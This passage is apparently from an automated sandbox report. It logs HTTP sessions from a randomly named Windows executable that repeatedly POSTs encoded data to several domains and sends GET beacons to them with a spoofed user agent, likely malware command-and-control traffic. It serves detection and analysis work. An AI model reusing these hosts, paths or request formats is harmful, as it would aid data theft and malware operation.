                                                                                                                      3192.168.2.462726172.67.131.32803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:18:13.150916100 CET10913OUTPOST /c2q3/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.7wkto5nk230724z.click
                                                                                                                      Origin: http://www.7wkto5nk230724z.click
                                                                                                                      Referer: http://www.7wkto5nk230724z.click/c2q3/
                                                                                                                      Content-Length: 10303
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 75 39 63 47 71 39 4f 79 46 70 64 31 46 35 46 5a 75 2f 73 4e 6b 77 77 4f 34 70 6a 73 73 54 75 6b 79 4c 46 66 6b 6c 30 45 78 39 41 63 43 46 64 74 56 4e 5a 74 2f 69 50 52 61 6f 64 4b 31 38 47 41 77 30 67 6f 4f 36 6f 41 74 64 6d 73 54 59 4e 52 7a 63 74 77 45 55 4b 63 73 4e 5a 52 58 41 31 57 42 57 53 6f 77 33 46 6c 79 6d 69 6b 66 5a 34 7a 6a 4f 6b 6e 58 41 73 6f 4f 75 6a 58 57 44 72 6d 45 68 63 76 7a 77 44 63 4d 31 48 74 75 77 4d 74 48 31 41 2f 55 41 42 52 64 4c 4e 70 6f 57 54 39 31 36 31 44 6e 67 34 41 64 59 30 4f 68 7a 52 4b 6b 52 6c 66 45 53 36 63 35 47 64 48 61 75 33 38 38 34 41 57 77 68 54 30 79 61 77 4b 72 43 6f 68 4d 36 77 77 7a 69 70 62 41 2b 79 31 6a 4e 61 59 55 77 55 5a 61 49 6a 57 66 43 4f 45 67 50 47 44 5a 4d 50 35 46 74 6d 72 6b 45 35 4d 41 48 74 39 76 50 36 2b 59 37 57 4c 4a 4a 78 53 4e 4c 32 51 44 57 70 67 6e 67 55 46 56 45 64 77 64 62 33 72 56 37 64 61 36 49 77 64 6e 67 5a 4f 74 71 47 7a 2b 50 7a 55 47 67 38 6b 76 67 65 34 46 59 57 33 64 68 78 54 61 34 71 56 48 30 49 [TRUNCATED]
                                                                                                                      Data Ascii: sn0PLN=u9cGq9OyFpd1F5FZu/sNkwwO4pjssTukyLFfkl0Ex9AcCFdtVNZt/iPRaodK18GAw0goO6oAtdmsTYNRzctwEUKcsNZRXA1WBWSow3FlymikfZ4zjOknXAsoOujXWDrmEhcvzwDcM1HtuwMtH1A/UABRdLNpoWT9161Dng4AdY0OhzRKkRlfES6c5GdHau3884AWwhT0yawKrCohM6wwzipbA+y1jNaYUwUZaIjWfCOEgPGDZMP5FtmrkE5MAHt9vP6+Y7WLJJxSNL2QDWpgngUFVEdwdb3rV7da6IwdngZOtqGz+PzUGg8kvge4FYW3dhxTa4qVH0IswzioBbqVNyRQWlJPcGxj7xn1XJvjRj/vZlbrMXN6FyiizgbUb1XiioZ67tWwzAC861CCZhBV56HJbT5VVRhX8a4HsCcF9gwoWAkQTFLYxKpdMPK7etlh4GfPDOb/f4pKbTSw7muB/g3YO/f/Pgk2HF62lMpiymRXWZCepUTQ28KSd/pUzkfAHDUkehn4QxpM4oh1PUa8XhzLZI7OK8+JIfM/3igQinooR1jYRdJ7SD8z7azZfgHIHSBFFTsTRD2awhkyRaQclj5AP9Wi8dHvAMLGX9O1BXKoH1CMDrTVKgLJVFDqdrflkc+k1Dsq5dYeWS4OfadSncou2VoFQeA8BfwTG557ACfiKy+JtSO3e6+QdoMbpeN5U5ztZHFWK47f4d3lKsKZGAbWfxGQ7dgGtuqLTzFhCwKFT13AkFDVgfZAz3d6T1fOhFUjqzSlZgv1eP9lS/Mnwqr8mK3s16vpK6vayc7pbeNFFe1npR8di3B+Rk6d+5QR7efqIUsw8KWOzpCzQ29EV+lXmnDmBTeq3YSXhSlR3PI1Bd3gxchBT138zndsjyLo/a0wXQ+sGS8xWkQHQz2eEvUR9weRz7YJIZo0HW40hTF8e/v0px6gYzGxFo6/IIL4eClxILqHEauoZk59H2UKRa6ZXI+S+tHauvcHj/FJwRRwy [TRUNCATED]
                                                                                                                      Nov 1, 2024 09:18:13.849462986 CET903INHTTP/1.1 404 Not Found
                                                                                                                      Date: Fri, 01 Nov 2024 08:18:13 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8RA%2FLffMnzwoLayDK0zaK%2F7WsIs%2F0tR3hjjKdxMjZLumfZAZa2tnPYmRysmVBIEceFE%2Fqd1Y2zf6GHzfdx32LFXUHcTHQLOTkirnuFvpgjcr0HzbHbRuVVTTyTOxl2dfd%2FxTW2PIgYTd3cop"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8dba73f37ef86bc2-DFW
                                                                                                                      Content-Encoding: gzip
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=944&sent=5&recv=12&lost=0&retrans=0&sent_bytes=0&recv_bytes=10913&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                      Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      4192.168.2.462737172.67.131.32803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:18:15.765502930 CET538OUTGET /c2q3/?sn0PLN=j/0mpNm2Bsp7DIZ0lL93uSEy3O7+v2qbjKVTngZW+fxoFlp5b+1ximLQJstL0djCplBlCo8niZKHcOIqzu0BFGSn0M5MS0dRMByh0HJ4/jaoTuMehM4oDS0=&xZa=jpgDOVH8PXW8oBA0 HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.7wkto5nk230724z.click
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Nov 1, 2024 09:18:16.414262056 CET908INHTTP/1.1 404 Not Found
                                                                                                                      Date: Fri, 01 Nov 2024 08:18:16 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C0W6XyshX0KiHwYowSrAyRyzeAHishgVefMvUPUNVT9GX7Vr9iceEMCflrliOG8oJIB3O23QUgWPTMBYjoM7j%2FOaUpM8AAP3ikPz6O8nLBHYB4Wdbl1geA1Bv47Wa9CW3ze7w23CMkF%2B4QYr"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8dba7403992a2e78-DFW
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1328&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=538&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                      Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      5192.168.2.462773103.191.208.137803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:18:22.172318935 CET805OUTPOST /w5is/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.roopiedutech.online
                                                                                                                      Origin: http://www.roopiedutech.online
                                                                                                                      Referer: http://www.roopiedutech.online/w5is/
                                                                                                                      Content-Length: 203
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 4b 5a 71 41 50 4c 30 36 4f 49 39 4f 79 4b 68 32 66 78 47 62 43 4a 72 6a 57 7a 34 6a 51 53 44 46 4d 37 2b 32 59 49 39 62 6d 56 44 76 69 57 66 75 34 43 38 2b 58 69 64 4c 56 76 47 38 6d 7a 7a 6d 36 42 59 4c 4a 74 5a 7a 33 61 79 4f 38 43 2f 66 77 31 39 68 35 64 4e 4d 6f 50 4a 37 68 4b 71 30 77 2b 54 61 36 6e 76 54 39 30 7a 77 52 46 79 2f 47 79 6e 64 59 64 77 51 64 6d 72 31 2f 61 33 44 72 4a 77 38 35 43 57 67 57 48 37 37 71 55 74 34 54 51 64 66 6e 31 76 58 67 71 73 6d 48 69 78 6a 36 75 6a 6d 70 4e 59 31 50 50 65 61 33 42 49 4d 57 7a 76 74 45 35 6c 64 59 6a 49 76 42 62 42 6b 59 41 3d 3d
                                                                                                                      Data Ascii: sn0PLN=KZqAPL06OI9OyKh2fxGbCJrjWz4jQSDFM7+2YI9bmVDviWfu4C8+XidLVvG8mzzm6BYLJtZz3ayO8C/fw19h5dNMoPJ7hKq0w+Ta6nvT90zwRFy/GyndYdwQdmr1/a3DrJw85CWgWH77qUt4TQdfn1vXgqsmHixj6ujmpNY1PPea3BIMWzvtE5ldYjIvBbBkYA==


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      6192.168.2.462789103.191.208.137803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:18:24.710556984 CET825OUTPOST /w5is/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.roopiedutech.online
                                                                                                                      Origin: http://www.roopiedutech.online
                                                                                                                      Referer: http://www.roopiedutech.online/w5is/
                                                                                                                      Content-Length: 223
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 4b 5a 71 41 50 4c 30 36 4f 49 39 4f 79 75 6c 32 63 51 47 62 58 35 72 67 49 6a 34 6a 61 79 44 4a 4d 37 79 32 59 4a 6f 47 6d 6a 54 76 69 30 33 75 35 48 63 2b 51 69 64 4c 64 50 47 35 72 54 7a 74 36 42 64 32 4a 70 52 7a 33 61 32 4f 38 41 33 66 7a 45 39 6d 34 4e 4e 43 39 2f 4a 35 76 71 71 30 77 2b 54 61 36 6d 50 70 39 30 72 77 52 30 43 2f 63 54 6e 53 45 74 77 54 4b 57 72 31 37 61 33 66 72 4a 77 43 35 48 4f 65 57 42 2f 37 71 56 64 34 54 42 64 63 70 31 76 52 76 4b 74 53 57 77 59 5a 38 37 75 64 68 73 77 69 45 4e 4b 37 32 48 46 57 48 43 4f 36 57 35 42 75 46 6b 42 62 4d 59 38 74 44 44 58 6e 6f 2f 4a 79 53 39 71 6b 4d 46 7a 72 2f 51 41 61 4b 4f 6b 3d
                                                                                                                      Data Ascii: sn0PLN=KZqAPL06OI9Oyul2cQGbX5rgIj4jayDJM7y2YJoGmjTvi03u5Hc+QidLdPG5rTzt6Bd2JpRz3a2O8A3fzE9m4NNC9/J5vqq0w+Ta6mPp90rwR0C/cTnSEtwTKWr17a3frJwC5HOeWB/7qVd4TBdcp1vRvKtSWwYZ87udhswiENK72HFWHCO6W5BuFkBbMY8tDDXno/JyS9qkMFzr/QAaKOk=


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      7192.168.2.462805103.191.208.137803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:18:27.305403948 CET10907OUTPOST /w5is/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.roopiedutech.online
                                                                                                                      Origin: http://www.roopiedutech.online
                                                                                                                      Referer: http://www.roopiedutech.online/w5is/
                                                                                                                      Content-Length: 10303
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 4b 5a 71 41 50 4c 30 36 4f 49 39 4f 79 75 6c 32 63 51 47 62 58 35 72 67 49 6a 34 6a 61 79 44 4a 4d 37 79 32 59 4a 6f 47 6d 6a 62 76 68 46 58 75 34 6d 63 2b 52 69 64 4c 63 50 47 34 72 54 7a 4b 36 46 35 79 4a 70 64 46 33 5a 65 4f 39 69 50 66 37 57 46 6d 79 4e 4e 43 69 76 4a 38 68 4b 71 62 77 39 37 47 36 6d 2f 70 39 30 72 77 52 33 71 2f 53 53 6e 53 58 39 77 51 64 6d 72 78 2f 61 33 37 72 4a 49 53 35 48 37 6c 57 52 66 37 70 31 4e 34 55 7a 6c 63 68 31 76 54 6a 71 74 4b 57 77 45 38 38 37 62 6d 68 73 30 45 45 50 57 37 31 44 49 50 44 69 65 6b 49 50 4e 47 56 56 78 52 4e 4f 39 67 61 54 50 5a 67 4e 64 30 50 38 72 50 50 43 50 76 36 51 51 62 49 4c 45 5a 46 58 44 2b 43 5a 34 48 6e 45 77 4b 4e 71 38 74 54 53 4d 2f 63 31 43 4f 55 4a 45 53 38 53 71 6c 6c 6f 33 43 51 53 61 6c 2f 2f 67 39 55 78 77 47 48 2f 59 4a 34 75 57 4c 74 71 41 54 66 76 31 66 52 36 37 32 65 59 5a 5a 76 38 45 5a 30 71 52 4a 6b 47 58 36 55 37 55 44 78 4d 51 76 78 43 41 4c 7a 6b 6b 78 61 75 69 6a 37 6e 69 46 39 32 38 34 63 4e 75 [TRUNCATED]
                                                                                                                      Data Ascii: sn0PLN=KZqAPL06OI9Oyul2cQGbX5rgIj4jayDJM7y2YJoGmjbvhFXu4mc+RidLcPG4rTzK6F5yJpdF3ZeO9iPf7WFmyNNCivJ8hKqbw97G6m/p90rwR3q/SSnSX9wQdmrx/a37rJIS5H7lWRf7p1N4Uzlch1vTjqtKWwE887bmhs0EEPW71DIPDiekIPNGVVxRNO9gaTPZgNd0P8rPPCPv6QQbILEZFXD+CZ4HnEwKNq8tTSM/c1COUJES8Sqllo3CQSal//g9UxwGH/YJ4uWLtqATfv1fR672eYZZv8EZ0qRJkGX6U7UDxMQvxCALzkkxauij7niF9284cNuLCgC94h3JkRNyDoBKaEIRRiJVnjk6TQlNyYpXREdThBNU1WJy7CBVDf8K6RWHO/VJUB9sBC2zOMuSOh0hA8ilIQzq6/e3tQKxx86HtXyX31bw0Df+80YHMeJU0jRYkRgAk/A45atVI/pyQRpSKdb8oLu38q3bVcB3LMiuvnr7Pj2VejNPxf/QMXynd9QeFmOMh9HupgM01aAmFuSqMpFVlwyBQKKHe5zXFNvouLFJaTPRir1plIz9ZPZ/bmSrCwSLgKDTPmNzjiisYg4yXX7q2u8OrGVB++whYLxKszYLKlwEXB74oEPP9VHy6C+FpgHRm3scLL/hUyefFWxbtUVwho7jAbEuUlxg6v5nCkuALAszPLs8o+yiVfsn2QF+EzMuCiUPvpuPQg8YojvUJ1GQ/HayiF6nGkkSqNNPt3/cd3wOXEJwZ6tDxzaiSkK98Utb1zd1FBfFitMkjIgqcfD1qx2te9iVOizXrJEXQTM2EXeDmRzTqtHjk1fHFKs2vy4jyMiEsrNGRKJcjAtVBbzZzsFhJiTv+lqzr7YmtUmNtSC8tBa+h1Yrvo2OxoEg/cT8uGVvOVWVtracSBmTh6xQBsy50OFRma4csF4LZwtg+Gy84CMuHEO8hQddl2eN6L4VdzRVvvoRJl7LWhVJ/Rp+mVsM0vztrwg4k [TRUNCATED]


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      8192.168.2.462821103.191.208.137803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:18:29.849773884 CET536OUTGET /w5is/?xZa=jpgDOVH8PXW8oBA0&sn0PLN=HbCgM9YcBMttwdZrXhLlY5z1HFkNRQK7DIvCaf9ftWyGunbQ91oOdhxta7T/vCia7UhAH45R/qaSwn7axWhs9/xB9a8/qr3Kz4jMxTKXhFTKb3+4TwbOFdg= HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.roopiedutech.online
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Nov 1, 2024 09:18:31.925614119 CET523INHTTP/1.1 301 Moved Permanently
                                                                                                                      Connection: close
                                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                      x-redirect-by: WordPress
                                                                                                                      location: http://roopiedutech.online/w5is/?xZa=jpgDOVH8PXW8oBA0&sn0PLN=HbCgM9YcBMttwdZrXhLlY5z1HFkNRQK7DIvCaf9ftWyGunbQ91oOdhxta7T/vCia7UhAH45R/qaSwn7axWhs9/xB9a8/qr3Kz4jMxTKXhFTKb3+4TwbOFdg=
                                                                                                                      x-litespeed-cache: miss
                                                                                                                      content-length: 0
                                                                                                                      date: Fri, 01 Nov 2024 08:18:31 GMT
                                                                                                                      server: LiteSpeed
                                                                                                                      vary: User-Agent


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      9192.168.2.4629033.33.130.190803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:18:45.297033072 CET775OUTPOST /mgme/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.suree.bet
                                                                                                                      Origin: http://www.suree.bet
                                                                                                                      Referer: http://www.suree.bet/mgme/
                                                                                                                      Content-Length: 203
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 36 6e 6a 66 69 48 64 2f 38 52 69 6b 5a 71 30 39 66 73 6d 55 47 45 61 4e 52 33 4c 76 71 33 56 4e 73 31 6b 68 39 53 67 37 64 64 36 35 70 6b 37 76 4e 74 6d 67 2f 75 4f 4f 74 55 56 73 49 39 2f 77 55 65 2f 58 44 56 69 39 39 6d 58 47 30 7a 6e 42 6d 35 50 48 44 74 53 54 33 6a 68 31 4c 44 31 59 77 32 56 30 35 77 46 54 53 2f 6f 49 4d 4a 53 39 59 76 61 58 45 6a 42 74 53 6c 47 65 64 6f 4e 52 6c 64 35 72 32 33 55 74 65 6c 30 45 4a 72 2b 46 67 46 74 4b 6f 57 34 58 4d 70 51 38 31 32 46 56 78 5a 77 4a 57 44 78 6b 4b 74 75 67 35 77 50 72 6a 43 51 79 70 4d 56 61 6c 36 63 4b 79 56 74 31 64 77 3d 3d
                                                                                                                      Data Ascii: sn0PLN=6njfiHd/8RikZq09fsmUGEaNR3Lvq3VNs1kh9Sg7dd65pk7vNtmg/uOOtUVsI9/wUe/XDVi99mXG0znBm5PHDtST3jh1LD1Yw2V05wFTS/oIMJS9YvaXEjBtSlGedoNRld5r23Utel0EJr+FgFtKoW4XMpQ812FVxZwJWDxkKtug5wPrjCQypMVal6cKyVt1dw==


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      10192.168.2.4629083.33.130.190803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:18:47.840290070 CET795OUTPOST /mgme/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.suree.bet
                                                                                                                      Origin: http://www.suree.bet
                                                                                                                      Referer: http://www.suree.bet/mgme/
                                                                                                                      Content-Length: 223
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 36 6e 6a 66 69 48 64 2f 38 52 69 6b 5a 4b 45 39 64 4c 4b 55 52 55 61 4f 4e 48 4c 76 6a 58 56 57 73 31 59 68 39 54 56 67 61 76 65 35 70 47 6a 76 4d 73 6d 67 2b 75 4f 4f 6a 30 56 74 58 4e 2f 76 55 65 43 69 44 55 4f 39 39 6d 54 47 30 33 6a 42 6d 71 58 41 52 74 53 56 2f 44 68 7a 50 44 31 59 77 32 56 30 35 77 35 35 53 2f 67 49 4d 35 43 39 4b 62 32 51 4b 44 41 66 61 46 47 65 4b 34 4e 56 6c 64 34 34 32 7a 4d 48 65 67 6f 45 4a 72 75 46 67 58 46 46 68 57 34 56 44 4a 52 35 2b 31 67 66 7a 6f 31 59 56 69 64 6c 4b 4d 4f 79 78 57 43 78 79 7a 78 6c 37 4d 78 70 34 39 56 2b 2f 57 51 38 47 35 41 62 55 31 50 48 42 36 78 6f 38 43 73 47 71 53 38 5a 65 4f 6b 3d
                                                                                                                      Data Ascii: sn0PLN=6njfiHd/8RikZKE9dLKURUaONHLvjXVWs1Yh9TVgave5pGjvMsmg+uOOj0VtXN/vUeCiDUO99mTG03jBmqXARtSV/DhzPD1Yw2V05w55S/gIM5C9Kb2QKDAfaFGeK4NVld442zMHegoEJruFgXFFhW4VDJR5+1gfzo1YVidlKMOyxWCxyzxl7Mxp49V+/WQ8G5AbU1PHB6xo8CsGqS8ZeOk=


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      11192.168.2.4629093.33.130.190803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:18:50.420914888 CET10877OUTPOST /mgme/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.suree.bet
                                                                                                                      Origin: http://www.suree.bet
                                                                                                                      Referer: http://www.suree.bet/mgme/
                                                                                                                      Content-Length: 10303
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
